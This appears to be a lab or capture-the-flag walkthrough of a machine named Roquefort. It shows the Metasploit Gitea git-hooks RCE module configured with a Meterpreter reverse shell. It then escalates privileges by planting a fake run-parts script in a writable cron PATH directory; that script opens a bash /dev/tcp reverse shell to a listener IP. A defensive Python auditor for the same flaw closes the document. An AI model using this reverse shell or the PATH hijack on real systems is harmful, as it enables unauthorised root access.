# Roquefort

### Enumeration

```
3000/tcp open   ppp?
```

The service on port 3000 is Gitea 1.7.5: <https://github.com/go-gitea/gitea/releases/tag/v1.7.5>

Created a user account on the Gitea instance; the Metasploit module below authenticates with it.

`msf6 exploit(multi/http/gitea_git_hooks_rce)`

### Initial Access

```
msf6 exploit(multi/http/gitea_git_hooks_rce) > options 

Module options (exploit/multi/http/gitea_git_hooks_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   password123      yes       Password to use
   Proxies                     no        A proxy chain of format type:host:port[,t
                                         ype:host:port][...]
   RHOSTS     192.168.246.67   yes       The target host(s), see https://github.co
                                         m/rapid7/metasploit-framework/wiki/Using-
                                         Metasploit
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connection
                                         s
   SSLCert                     no        Path to a custom SSL certificate (default
                                          is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default
                                         is random)
   USERNAME   test             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.49.246   yes       The listen address (an interface may be speci
                                     fied)
   LPORT  3000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper
```

### PrivEsc

Writable PATH directory -> `/usr/local/bin`

```
chloe@roquefort:/$ cat /etc/crontab
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
```

The crontab invokes `run-parts` by relative name, so cron resolves it through that PATH, and the writable `/usr/local/bin` is searched before the system directories.

Save the following as `run-parts` in `/usr/local/bin` and make it executable:

```
#!/bin/bash

0<&196;exec 196<>/dev/tcp/192.168.49.95/21; /bin/bash <&196 >&196 2>&196
```
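As an added defender-side check (not part of the original notes), the script below parses a system crontab, picks out commands invoked by relative name, and reports every PATH entry that cron would search before the directory holding the real binary and that the caller can write to; the crontab text, the `resolve` callback and the `writable` predicate are constructed inputs so it runs offline.

```python
import os, re, shlex

# Constructed sample modelled on the crontab quoted above; not the real file.
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
"""
BUILTINS = {"cd", "test", "[", "exec", "true", "false"}  # never resolved via PATH

def parse_crontab(text):
    """Return (PATH entries, [(user, command), ...]) from a system crontab."""
    path_dirs, jobs = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_]\w*)=(.*)$", line)
        if m:
            if m.group(1) == "PATH":
                path_dirs = m.group(2).strip('"').split(":")
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return path_dirs, jobs

def relative_commands(command):
    """Program names invoked without a slash, i.e. looked up through cron's PATH."""
    names = []
    for chunk in re.split(r"\|\||&&|;|\|", command):
        toks = shlex.split(chunk.strip(" ()"))
        if toks and "/" not in toks[0] and toks[0] not in BUILTINS:
            names.append(toks[0])
    return names

def audit(crontab_text, resolve, writable):
    """[(user, name, [writable PATH dirs searched before the real binary])]."""
    path_dirs, jobs = parse_crontab(crontab_text)
    findings = {}
    for user, cmd in jobs:
        for name in relative_commands(cmd):
            real = resolve(name)  # e.g. shutil.which; None if absent
            if not real:
                continue
            real_dir = os.path.dirname(real)
            # cron's lookup stops at real_dir, so a writable entry before it wins
            ahead = path_dirs[:path_dirs.index(real_dir)] if real_dir in path_dirs else path_dirs
            findings[(user, name)] = [d for d in ahead if writable(d)]
    return [(u, n, h) for (u, n), h in sorted(findings.items()) if h]
```

On a live host run `audit(open("/etc/crontab").read(), shutil.which, lambda d: os.access(d, os.W_OK))` as the unprivileged user; any finding is exactly the condition exploited above, and the fix is an absolute path in the crontab or removing write access from the directory.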
